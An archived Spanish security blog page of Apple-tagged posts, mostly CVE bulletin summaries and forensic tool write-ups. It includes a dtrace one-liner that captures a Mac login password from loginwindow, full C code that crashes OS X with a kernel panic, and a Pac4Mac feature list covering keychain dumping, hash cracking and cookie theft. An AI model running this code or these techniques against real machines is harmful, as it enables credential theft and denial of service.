Este blog ya no está activo, sigue informándote aquí:

Mostrando entradas con la etiqueta Apple. Mostrar todas las entradas
Mostrando entradas con la etiqueta Apple. Mostrar todas las entradas

viernes, 20 de abril de 2018

Historia.- Del Apple II+ al Iphone 6s

Hoy no tenia previsto hablar de esto, pero me ha parecido que esta imagen valía la pena compartirla y no es nada mas que una imagen donde se demuestra la capacidad que tenia un Apple II+ y como ha ido evolucionando este hasta lo que ahora conocemos como un Iphone 6s. 

Vamos, una pasada, aquí tenéis la imagen. 


Sed Buenos ;) 

lunes, 27 de marzo de 2017

Paper.- iOS 10 Security (Marzo 2017)

Si alguna vez habéis sentido curiosidad por ver como funciona la seguridad en iOS, como yo, os interesará saber que Apple ha "liberado" un paper dedicado a explicar a vista de águila como funciona la seguridad de iOS 10 así como detallar las APIs que utiliza para ciertos servicios. 


Un paper muy interesante si tenéis curiosidad por saber (a alto nivel claro) como funciona el cifrado por hardware, que pares van cifradas cuales no, etc. Vamos,  si te interesa saber como funciona la seguridad de un dispositivo Apple con iOS 10.

Sed Buenos ;) 

lunes, 18 de abril de 2016

Desinstala Quicktime en Windows

Ojo, Apple ha dejado de dar soporte a Quicktime en Windows y Trendmicro publicado dos vulnerabilidades que afectan directamente. Estas vulnerabilidades no utilizan el identificador CVE sino el ZDI descrito en la Zero day initiative por lo que son un poco mas difíciles de encontrar.


Id desinstalando los Quicktimes si usáis Windows por que Apple no parcheará estos 0'days. 

Detalle: 
  • ZDI-16-241: Vulnerabilidad que permite a un atacante remoto ejecutar código arbitrario sobre instalaciones vulnerables de Apple Quicktime. 
  • ZDI-16-242: Otra vulnerabilidad que permite le ejecución de código remoto sobre instalaciones vulnerables de Apple Quicktime. 

Productos afectados:
  • Última versión de Quicktime para Windows. 

Solución:

Más información:
Sed Buenos ;) 

lunes, 8 de febrero de 2016

Paper.- Inside Mac Security

Bueno, otra entrada de patatas, refresco y papers. Hoy os recomiendo el siguiente Paper de la mano de SANS donde hacen un completo repaso a la seguridad de los Mac y la verdad es que mas de uno nos lo tendríamos que leer a fondo antes de hablar. Note se que he escrito nos con lo cual me incluyo.


Abstract:
"Mac OS X includes many unique security technologies ranging from the Keyring system, integrated Kerberos, application and network firewalls, code signing, anti- malware and exploitation resistance technologies, and Internet client application security to many commands (client and server) specific to Macintosh systems that support the security systems including those for certificate management, firewall configuration, drive imaging and encryption. We introduce the Mac OS X security systems and discuss the built-in tools with deliberate focus on the system utilities and command line tools used by security professionals."

Enlace al Paper:
 Sed Buenos ;) 

martes, 2 de febrero de 2016

iOS 9.2.1.- Actualización de Seguridad

Bueno, hoy me he dado en la cara con las actualizaciones de iOS y Android, ya sabéis que últimamente me gusta hacer este tipo de entradas y como aun os debo algunas aquí van las de Apple y Ojo que las de Android vienen luego y con algunas vulnerabilidades Criticas


Vulnerabilidades:
  • CVE-2016-1717 : Un problema de corrupción de la memoria en el análisis de las imágenes de disco permite ha un usuario local podría ser capaz de ejecutar código arbitrario con privilegios de kernel. 
  • CVE-2016-1719 : Un problema de corrupción de la memoria en una API IOHIDFamily permite a un usuario local podría ser capaz de ejecutar código arbitrario con privilegios de kernel
  • CVE-2016-1720 : Otro problema de corrupción de memoria mejorando la gestión de la memoria permite a un usuario local podría ser capaz de ejecutar código arbitrario con privilegios de kernel 
  • CVE-2016-1721 : Otro problema de corrupción de memoria mejorando la gestión de la memoria permite a un usuario local podría ser capaz de ejecutar código arbitrario con privilegios de kernel
  • CVE-2015-7995 : Un problema de confusión de tipos en libxslt permite al visitar un sitio web creado con fines malintencionados provocar la ejecución de código arbitrario syslog
  • CVE-2016-1722 : Otro problema de corrupción de memoria mejorando la gestión de la memoria permite a un usuario local podría ser capaz de ejecutar código arbitrario con privilegios de root.
  • CVE-2016-1723 : Un problemas de corrupción de memoria en WebKit permite, al visitar un sitio web creado con fines malintencionados, provocar la ejecución de código arbitrario
  • CVE-2016-1724 : Un problemas de corrupción de memoria en WebKit permite, al visitar un sitio web creado con fines malintencionados, provocar la ejecución de código arbitrario
  • CVE-2016-1725 : Un problemas de corrupción de memoria en WebKit permite, al visitar un sitio web creado con fines malintencionados, provocar la ejecución de código arbitrario
  • CVE-2016-1726 : Un problemas de corrupción de memoria en WebKit permite, al visitar un sitio web creado con fines malintencionados, provocar la ejecución de código arbitrario
  • CVE-2016-1727 : Un problemas de corrupción de memoria en WebKit permite, al visitar un sitio web creado con fines malintencionados, provocar la ejecución de código arbitrario
  • CVE-2016-1728 : Un problema de privacidad en la gestión del selector CSS "a:visited button" al evaluar la altura del elemento de contención permite a los sitios web saber si el usuario había visitado un enlace en concreto
  • CVE-2016-1730 : Un problema que permite a algunos portales de captación leer o escribir cookies permite a un portal de captación malicioso acceder a las cookies del usuario
Productos afectados:
  • iPhone 4s y posterior, iPod touch (5.ª generación) y posterior, iPad 2 y posterior, con versiones anteriores a iOS 9.2.1
Solución:
Más Información:
Sed Buenos y actualizad 0;)

jueves, 22 de octubre de 2015

Actualizaciones de Seguridad Para iOS, Safari, MacOSX (¡ACTUALIZA!)

Hace mas o meno medio mes fui al barbero de toda la vida, el sabe de lo que trabajo y como le gusta la tecnología a veces me preguntas por cosas curiosas o por pequeñas dudas que tenga el.  Bueno, el otro día me pregunto el porqué no se utilizaban Macs para trabajar en las empresas si estaba demostrado que eran mucho mas seguros y resistentes. 


Ya podéis adivinar cual fue mi respuesta pero, aprovechando que ayer Apple lanzo unos cuantos boletines de seguridad, hoy quiero centrarme en todas las vulnerabilidades de iOS, Safari, MacOSX que se han notificado este mes para que si hay alguien que piense que los productos Apple no tienen fallos de seguridad esta muy equivocado. 

iOS:
  • CVE-2015-5940: Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario. 
  • CVE-2015-7006: Un fallo al desempaquetar un archive malicioso permite ejecutar código arbitrario.
  • CVE-2015-7023 : Vulnerabilidad que permite a una página maliciosa permite que las cookies sean sobrescritas.
  • CVE-2015-7015 : Vulnerabilidad que permite a una aplicación maliciosa elevar sus privilegios.
  • CVE-2015-5925 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-5926 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-6975 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6992 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-7017 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario..
  • CVE-2015-6995 : Vulnerabilidad que permite a una aplicación maliciosa ejecutar código arbitrario con privilegios del sistema. 
  • CVE-2015-5927 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-5942: Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6976 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6977 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6978 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6990 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6991 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6993 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-7008 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-7009 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-7010 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-7018 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6979 : Vulnerabilidad que permite a una aplicación maliciosa ejecutar código arbitrario con privilegios del sistema
  • CVE-2015-6989 : Un fallo al procesar un paquete específicamente creado permite ejecutar código de manera arbitraria. 
  • CVE-2015-6986 : Un fallo al ejecutar una aplicación maliciosa permite ejecutar código arbitrario dentro del Kernel de Linux.
  • CVE-2015-5935 : Un fallo al ver una imagen maliciosa permite ejecutar código arbitrario. 
  • CVE-2015-5936 : Un fallo al ver una imagen maliciosa permite ejecutar código arbitrario. 
  • CVE-2015-5937 : Un fallo al ver una imagen maliciosa permite ejecutar código arbitrario.
  • CVE-2015-5939 : Un fallo al ver una imagen maliciosa permite ejecutar código arbitrario.
  • CVE-2015-6996 : Vulnerabilidad que permite a una aplicación maliciosa ejecutar código arbitrario con privilegios del sistema
  • CVE-2015-6974: Vulnerabilidad que permite a una aplicación maliciosa ejecutar código arbitrario con privilegios del sistema
  • CVE-2015-7004 : Vulnerabilidad que permite causar una denegación de servicio en local
  • CVE-2015-6988 : Un fallo permite a un atacante con una posición privilegiada en la red ejecutar código arbitrario. 
  • CVE-2015-6994 : Vulnerabilidad que permite causar una denegación de servicio en local.
  • CVE-2015-7000 : Vulnerabilidad que permite que aparezcan notificaciones de llamadas y mensajes en la pantalla de bloqueo. 
  • CVE-2015-5924 : Visiting a maliciously crafted website may lead to arbitrary code execution
  • CVE-2015-6983 : Un fallo al procesar un archive de fuente malicioso permite sobrescribir archivos.
  • CVE-2015-6999 : Un fallo permite al atacante que un certificado revocado aparezca como válido. 
  • CVE-2015-7022 :Vulnerabilidad que permite a una aplicación maliciosa filtrar información del usuario. 
  • CVE-2015-5928 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-5929 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-5930 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-6981: Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-6982: Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-7002 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-7005 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario. 
  • CVE-2015-7012 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-7014: Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.

Productos afectados:
  • iPhone 4s and later, iPod touch (5th generation) y anteriores, iPad 2 y anteriores. 
Más información:
Solución:

  • Esta actualización ya está disponible desde el Software Update o el Apple Downloads site.

Safari:
  • CVE-2015-5928 : Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-5929 : Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-5930 : Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-5931: Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-7002 : Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-7011 : Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-7012 : Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-7013 : Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-7014: Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 

Productos afectados:

  • OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, y OS X El Capitan v10.11 

Más información:

Solución:
  • Apple ha publicado la versión 9.0.1 de Safari y ya está disponible desde la Mac App Store.

MacOSX:
  • CVE-2015-5940 : Un fallo al visitar una página web maliciosa permite la ejecución de código arbitrario. 
  • CVE-2015-0235: Múltiples vulnerabilidades en PHP 
  • CVE-2015-0273: Múltiples vulnerabilidades en PHP 
  • CVE-2015-6834: Múltiples vulnerabilidades en PHP 
  • CVE-2015-6835: Múltiples vulnerabilidades en PHP 
  • CVE-2015-6836: Múltiples vulnerabilidades en PHP 
  • CVE-2015-6837: Múltiples vulnerabilidades en PHP 
  • CVE-2015-6838: Múltiples vulnerabilidades en PHP 
  • CVE-2015-6985 : Un fallo al visitar una página web maliciosa permite el inesperado cierre de una aplicación o la ejecución arbitraria de código. 
  • CVE-2015-7003 : Un fallo en coreaudiod permite la no inicialización de la memoria. 
  • CVE-2015-5933 : Un fallo en la ejecución de un archivo de audio permite la ejecución remota de código. 
  • CVE-2015-5934 : Un fallo en la ejecución de un archivo de audio permite la ejecución remota de código. 
  • CVE-2015-7006 : Un fallo en el desempaquetado de un archive malicioso permite la ejecución arbitraria de código. 
  • CVE-2015-7023 : Un fallo al visitar una página web especialmente creada permite sobrescribir las cookies. 
  • CVE-2015-7015 : Vulnerabilidad que permite a una aplicación maliciosa elevar sus privilegios. 
  • CVE-2015-5925 : Un fallo al visitar una página web maliciosa permite la ejecución de código arbitrario. 
  • CVE-2015-5926 : Un fallo al visitar una página web maliciosa permite la ejecución de código arbitrario. 
  • CVE-2015-6992 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6975 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-7017 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-5944 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6995 : Vulnerabilidad que permite a una aplicación maliciosa ejecutar código arbitrario con privilegios del sistema 
  • CVE-2015-7035 : Vulnerabilidad que permite a aun atacante ejecutar funciones EFI 
  • CVE-2015-6987 : Un fallo en navegar con marcadores especialmente creados permite el cierre inesperado de la aplicación. 
  • CVE-2015-5927 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-5942: Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6976 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6977 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6978 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6991 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6993 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-7009 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-7010 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-7018 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6990 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario 
  • CVE-2015-7008 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario 
  • CVE-2015-6989 : Un fallo en el proceso de paquetes especialmente creados permite la ejecución de código arbitrario. 
  • CVE-2015-7019 : Vulnerabilidad que permite a un usuario local causar el cierre inesperado del Sistema o leer la memoria del kernel. 
  • CVE-2015-7020 : Vulnerabilidad que permite a un usuario local causar el cierre inesperado del Sistema o leer la memoria del kernel. 
  • CVE-2015-7021 : Vulnerabilidad que permite a un usuario local ejecutar código arbitrario con privilegios del kernel. 
  • CVE-2015-5935 : Un fallo en el proceso de un archive de imagen permite la ejecución de código arbitrario. 
  • CVE-2015-5938 : Un fallo en el proceso de un archive de imagen permite la ejecución de código arbitrario. 
  • CVE-2015-5936 : Un fallo en el proceso de un archive de imagen permite la ejecución de código arbitrario. 
  • CVE-2015-5937 : Un fallo en el proceso de un archive de imagen permite la ejecución de código arbitrario. 
  • CVE-2015-5939 : Un fallo en el proceso de un archive de imagen permite la ejecución de código arbitrario. 
  • CVE-2015-6996 : Vulnerabilidad que permite a una aplicación maliciosa ejecutar código arbitrario con privilegios del sistema. 
  • CVE-2015-6974 : Vulnerabilidad que permite a un usuario local ejecutar código arbitrario. 
  • CVE-2015-5932 : Vulnerabilidad que permite a un usuario local causar el cierre inesperado del Sistema o leer la memoria del kernel. 
  • CVE-2015-6988 : Vulnerabilidad que permite a un atacante con una posición privilegiada en la red ejecutar código arbitrario 
  • CVE-2015-6994 : Vulnerabilidad que permite a un usuario local causar una denegación de servicio. 
  • CVE-2015-6984 : Vulnerabilidad que permite a una aplicación maliciosa sobrescribir archivos de forma arbitraria. 
  • CVE-2012-6151: Vulnerabilidad que permite a un atacante con una posición privilegiada en la red ejecutar una denegación de servicio. 
  • CVE-2014-3565: Vulnerabilidad que permite a un atacante con una posición privilegiada en la red ejecutar una denegación de servicio. 
  • CVE-2015-5924 : Un fallo al visitar una página web maliciosa permite la ejecución de código arbitrario. 
  • CVE-2015-6563 : Vulnerabilidad que permite a un usuario local provocar ataques no definidos. 
  • CVE-2015-5945 : Vulnerabilidad que permite a un usuario local ejecutar código arbitrario con privilegios del kernel. 
  • CVE-2015-7007 : Vulnerabilidad permite correr AppleScripts de forma arbitraria. 
  • CVE-2015-6983 : Vulnerabilidad que permite a una aplicación maliciosa sobrescribir archivos de forma arbitraria 
  • CVE-2015-5943: Vulnerabilidad que permite a una aplicación maliciosa controlar los keychain access prompts 

Productos afectados:
  • OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, y OS X El Capitan 10.11 

Más información:

Solución:

Bueno, también supongo que a alguien le servirá esta información pero que nadie me diga que los productos Apple son robustos y no tienen fallos de seguridad.

Sed Buenos ;) 

viernes, 25 de septiembre de 2015

Mac4n6 Group.- Colección De Localizaciones Forenses Para Mac y iOS

Mac4n6 Group, aunque parezca el nombre de una sociedad secreta, no deja de ser un repositorio donde toda la gente que quiera contribuir puede dejar recursos que ayuden al peritaje forense de dispositivos Mac y iOS. La verdad es que me parece una iniciativa genial ya que normalmente la información para este tipo de peritaje esta disuelta y cada perito tiene sus propias herramientas o script. Así que, un repositorio para congregaros a todos es la mejor opción para no perder el tiempo si estas trabajando.


Extracto del readme del repositorio:
"The idea is to create one single point of collection for OS X and iOS artifacts location, trying to collect more information for each artifact, not just a path!" 
"The motto? Reusable format. The goal is that the information collected have to be “machine parsable” and mostly “human readable/writable”, reusable by any application, library, etc. (am I too optimistic?). That is why as main collaboration tool for the collection, we use a shared spreadsheet so that anyone can add new artifacts, there is no need to know how to code to contribute to this project (so, no excuses!). From here, two (simple) scripts will convert the csv file into:
  • yaml artifact library file, so that other applications can use it. No crapy/fancy xml things.
  • ForensicsWiki page, one of the point of reference for forensics practitioners."

"This way the effort is centralized and made only once."

Enlace al repositorio:
Espero que os sea útil. al menos a mi me ha sorprendido y si conocéis mas iniciativas como esta no dudéis en utilizar la caja de sugerencias, los comentarios o contactar-me por algún lado.

Sed Buenos ;)

domingo, 28 de junio de 2015

Pac4Mac (Plug And Check para Mac OS X)

Esta entrada no es mas que un aporte que hicie en le foro de Undercode y me gustaría compartir contigo ya que he hablado muchas veces de como hacer Forenses en Linux y en Windows pero nunca he tocado Mac OS X. 

Pac4Mac es una herramienta para extraer y analizar información de un MAC OS X (vamos para hacerle un forense en condiciones) Ademas, esta bajo una Apache License 2.0.




Os dejo con las features de Pac4Mac :

• Developed in Python 2.x (natively supported) 
• Framework usage
• Support of OS X 10.6, 10.7, 10.8 and 10.9 (not tested)

Data extraction through:

• User or Root access
• Single Mode access
• Target Mode access (Storage media by Firewire or Thunderbolt)

It use 3 dumping modes : Quick, Forensics, Advanced: 

• Dumping Users / User Admin

• Dumping Mac's Identity (os version, owner)

• Dumping Miscellaneous files (Address book, Trash, Bash history, stickies, LSQuarantine, AddressBook, Safari Webpage Preview, Office Auto Recovery, WiFI access history, …)
• Dumping content of current Keychain (security cmd + securityd process)
• Dumping Users Keychains

• Dumping System Keychains

• Dumping password Hashes

• Live Cracking hashes password
s
• Dumping Browser Cookies (Safari, Chrome, Firefox, Opera)

• Dumping Browser Places (Safari, Chrome, Firefox, Opera)

• Dumping Browser Downloads history (Safari, Chrome, Firefox, Opera)

• Dumping printed files

• Dumping iOS files backups

• Dumping Calendar and Reminders / Displaying secrets
• Dumping Skype messages / Displaying secrets on demand
• Dumping iChat, Messages(.app), Adium messages
• Dumping Emails content (only text)

• Dumping Emails content of all or special Mail Boxes
• Adding root user
• Dumping RAM
• Cloning local Disk
• Dumping system logs, install, audit, firewall

DMA access features (exploitation of Firewire and Thunderbolt interfaces)

• Unlock or bypass in writring into RAM
• Dumping RAM content
• Exploit extracted data (see Analysis module)

Analysis module in order to easily exploit extracted data by one of dumping modes

• Exploit Browser History
 x 4 (Displaying recordings, Local copy for usurpation)
• Exploit Browser Cookies
 x 4 (Displaying recordings, Local copy for usurpation)
• Display Browser Downloads
 x 4 (Displaying recordings)
• Exploit Skype Messages
 (Displaying/Recording all recorded messages, with secret information or containing a special keyword)
• Exploit iChat, Messages(.app), Adium messages (in the next version)
• Exploit Calendar Cache
 (Display/Recording all recorded entries, with secret information or containing a special keyword)
• Exploit Email Messages (Displaying/Recording all recorded messages, with secret information or containing a special keyword / )
• Exploit RAM memory Dump
 (Searching Apple system/applications/Web Passwords)
• Exploit Keychains
 (Display content Keychain
, Crack Keychain files)
• Crack Hashes passwords

• Exploit iOS files
 (Accessing to iPhone without passcode, reading secrets through iTunes backups)
• Display Stickies Widgets

• Display Printed Documents
• Display prospective passwords 
(displaying all found passwords during dump and analysis phases)

Etc. 

Más Información: 




Código fuente: 




Y un pequeño regalo para los que hayáis llegado a leer todo el post, aqui teneis todos los TIPS que se han utilizado para extraer y analizar la información para esta herramienta: 


miércoles, 24 de junio de 2015

Un Sniffer Para Apple Mac OS X En 140 Caracteres.

Hoy, ya que es un día de fiesta, me he decidido ha hacer una entrada mas normal fuera del Road To The CEH, así que me he decidido a curiosear mis redes sociales a la búsqueda de alguna noticia, articulo o paper que me llamara la atención. 


Pero, que hay mas curioso que un Sniffer cuyo comando de ejecución cabe en menos de 140 caracteres (138 para ser exactos, vamos un Tweet). Este Sniffer funciona en local y solamente en Mac OS X. Ya hay algunas versiones confirmadas, os las detallo mas abajo. 

Código del Sniffer: 

sudo dtrace -n 
'pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}' -p $(ps -A | grep -m1 loginwindow | awk '{print $1}')

Solo necesitaríamos ejecutar el "código" bloquear nuestro Mac y ver como ha sido capaz de sacar nuestra contraseña.

Versiones confirmadas de Mac OS X:
  • 10.10
  • 10.11β2
  • 10.9.5.
  • 10.10.3.
Fuente: 

martes, 28 de abril de 2015

¡En Mi Casa No Entra Un iOS! DDos De iOs Al Conectarse A Una Wifi

Hace tiempo hablamos de una [vulnerabilidad parecida en Android] que al conectarse a un punto de acceso de la marca Wifi Direct Android podía generar una denegación de servicio para si mismo. Pues lo mismo pasa con iOS aunque los investigadores que han encontrado esta vulnerabilidad,Yair Amit y Adi Sharabani de la empresa Skysekure, ya la han bautizado con el genial nombre de No iOS Zone. El cual me encanta. 


"Un error que reside en el tratamiento de certificados SSL específicamente creados, de forma que se puede provocar la caída de cualquier aplicación que use este tipo de comunicación. Como la mayoría de las aplicaciones de la App Store emplean este tipo de comunicación, la superficie de ataque es muy amplia. Sabíamos que cualquier retraso en parchear la vulnerabilidad podría llevar a un
impacto"

Mitigaciones:

  • Desconectate de la wifi o cambia de lugar si experimentas demasiados reinicios o crasheos en tu iOS. 
  • Deberías actualizar a la ultima versión de iOS 8.3 la cual corrige este error. 
  • En general deberías desconfiar y mucho de las “FREE” Wi-Fi network.

Vídeo de la PoC de esta vulnerabilidad:


Muchas mas información y fuente de la noticia:


Sed Buenos ;)

lunes, 13 de abril de 2015

Tu iOS y Cada Vez El De Mas Bichos

Hace unos días Apple publicó un boletín de seguridad donde corregía la friolera de 58 vulnerabilidades nuevas dispuestas cada una a tocarte el Iphone de la mejor manera que sepan. Así que aquí os dejo el extracto de Un Al Día un poco mas ordenado para que podáis localizar fácilmente si vuestro smartphone es vulnerable o no. 



Aquí tenéis la actualización de iOS 8.3:

  • Ejecución de código a través de 'WebKit' (del CVE-2015-1068 hasta CVE-2015-1083 y del CVE-2015-1119 hasta CVE-2015-1124), 'CFURL' (CVE-2015-1088), 'FontParser' (CVE-2015-1093), 'IOHIDFamily' (CVE-2015-1095), e 'iWork Viewer' (CVE-2015-1098). Además los fallos relacionados con los drivers de audio (CVE-2015-1086) y el Kernel (CVE-2015-1101), permitirían la ejecución de código arbitrario con permisos de 'system'. 
  • Salto de restricciones o medidas de seguridad a través del sistema de copias de seguridad (CVE-2015-1087), 'CFNetwork' (CVE-2015-1089 y CVE-2015-1091), Kernel (CVE-2015-1103 y CVE-2015-1104), 'Keyboards' (CVE-2015-1106), 'Lock Screen' (CVE-2015-1107 y CVE-2015-1108), 'Safari' (CVE-2015-1111 y CVE-2015-1112), 'Telephony' (CVE-2015-1115) y 'WebKit' (CVE-2015-1125 y CVE-2015-1126). Como nota destacar los errores relacionados con la pantalla de bloqueo ya que uno de ellos evitaría que el dispositivo eliminase su contenido al superarse los intentos de desbloqueo (de encontrarse activa dicha opción) mientras que el otro aumentaría de forma indefinida la restricción del número máximo de intentos de desbloqueo permitidos. 
  • Elevación de privilegios a través del Kernel (CVE-2015-1117). 
  • Diez errores de seguridad permitirían revelar información sensible a través de 'AppleKeyStore' (CVE-2015-1085), 'Foundation' (CVE-2015-1092), 'IOAcceleratorFamily' (CVE-2015-1094), 'IOHIDFamily' (CVE-2015-1096), 'IOMobileFramebuffer' (CVE-2015-1097), 'NetworkExtension' (CVE-2015-1109), 'Podcasts' (CVE-2015-1110), 'Sandbox Profiles' (CVE-2015-1113 y CVE-2015-1114) y 'UIKit View' (CVE-2015-1116). 
  • Varias denegaciones de servicio relacionadas con el Kernel (CVE-2015-1099, CVE-2015-1100, CVE-2015-1102 y CVE-2015-1105) y con la configuración de los perfiles por parte de 'libnetcore' (CVE-2015-1118). 
  • Una suplantación de URLs (CVE-2015-1084) en 'WebKit' permitiría hacer creer a la víctima que se encuentra en otra dirección al visitar un sitio web. 
  • Una vulnerabilidad en 'CFNetwork' podría afectar a la integridad del dispositivo y eliminar completamente el historial de navegación (CVE-2015-1090).

Productos afectados:
  • Apple iPhone 4s y posteriores, iPad 2 y posteriores e iPod a partir de 5ª generación 

Solución:
  • La actualización ya está disponible a través de iTunes o del propio dispositivo (en Ajustes/General/Actualización de software). 

Más información y fuentes:


Sed Buenos ;)

miércoles, 25 de febrero de 2015

¡¡Widowseros!! ¡Estamos de Celebración!

Hoy me he topado de cara con la lista de sistemas mas vulnerables del 2014 y la verdad es que me he llevado una grata sorpresa al ver quien estaba en la última posición. Estos años defendiendo a Windows Vista y luego a Windows 8 (a Windows 10 que le den hasta que no saquen el Keylogger) han dando al final su fruto. 

¡Windowseros/Windowseras Microsoft Windows es el sistema operativo menos vulnerable!




La verdad es que los datos son los que hay: 



Aunque como bien han dicho en la fuente en SecurityByDefault, estos datos solo corresponden a sistema operativo como tal, si cogemos y analizamos las aplicaciones encontramos que Internet Explorer es el software mas vulnerable. Y nos reíamos de Adobe Flash .. 


Así que, es una victoria a medias ya que en Windows tenemos a Internet Explorer instalado por defecto. De esta manera y dejando de lado las discusiones tontas, ningún sistema operativo es 100% seguro así que nos hemos de quedar con el que nos sintamos mas a gusto y protegidos.

Fuente de esta entrada:


Sed Buenos ;) 

sábado, 21 de febrero de 2015

Kernel Panic en Mac OS X Con Solo 10 lineas de Código

Ya que supongo que esta asumido que en los productos Apple también hay Malware, también os diré que Mac OS X también se pude colgar con muy pocas lineas de código. Ademas, escritas en C.


Estas son este es el código que nos permitirá hacernos unas risas con cualquiera que utilice un Mac Os X en cualquiera de las últimas versiones:

#include <unistd.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach-o/dyld.h>

int
main (int argc, char * argv[])
{
  volatile char * library;
  const mach_vm_size_t page_size = getpagesize ();
  const mach_vm_size_t buffer_size = 3 * page_size;
  char buffer[buffer_size];
  mach_vm_size_t result_size;

  library = (char *) _dyld_get_image_header (1);
  mach_vm_protect (mach_task_self (), (mach_vm_address_t) (library + page_size), page_size, FALSE, VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY | VM_PROT_EXECUTE);
  library[page_size]++;
  library[page_size]--;
  result_size = 0;
  mach_vm_read_overwrite (mach_task_self (), (mach_vm_address_t) library, buffer_size, (mach_vm_address_t) buffer, &result_size);

  return 0;
}

Más Información sobre el script:

Sed Buenos con esto ;) 

sábado, 24 de enero de 2015

Elevación de privilegios en OS X Yosemite Gracias al Project Zero.

Como ya sabréis ningún sistema operativo es seguro por si mismo y eso quiere decir que hay hackers dándole fuerte y flojo a todo lo que encuentran con el fin de descubrir alguna vulnerabilidad y reportarlas. Esto es lo que han hecho los miembros del Project Zero de Google con tres vulnerabilidades para los sistemas OS X. 


Para los que no sepas que es el Project Zero de Google solo decir que son un equipo dedicado a encontrar fallos de seguridad en diferentes productos. Aunque, ahora están en boca de todos ya que cumplen con  su peculiar política de publicar automáticamente las vulnerabilidades despues de 90 días de haberlas comunicado a la empre responsable de ese software.

Mas información sobre el Projec Zero: 

Las tres vulnerabilidades publicadas por este equipo permiten la elevación de privilegios en OS X Yosemite.
"El primer fallo reside en el componente networkd (com.apple.networkd), un demonio del sistema que implementa el servicio XPC, debido a que no se comprueban las entradas de forma adecuada. El investigador confirma que solo se ha probado en 10.9.5 pero parece ser que OS X Yosemite introduce mitigaciones que evitan la vulnerabilidad."

"Los dos problemas restantes afectan a IOKit, el primero por una desreferencia de puntero nulo mientras que el segundo requiere la conexión de un dispositivo Bluetooth de debe a una corrupción de memoria en IOBluetoothDevice."

Fuente:

Sed Buenos  ;) 

jueves, 4 de septiembre de 2014

The Fappening & Metadatos e.e

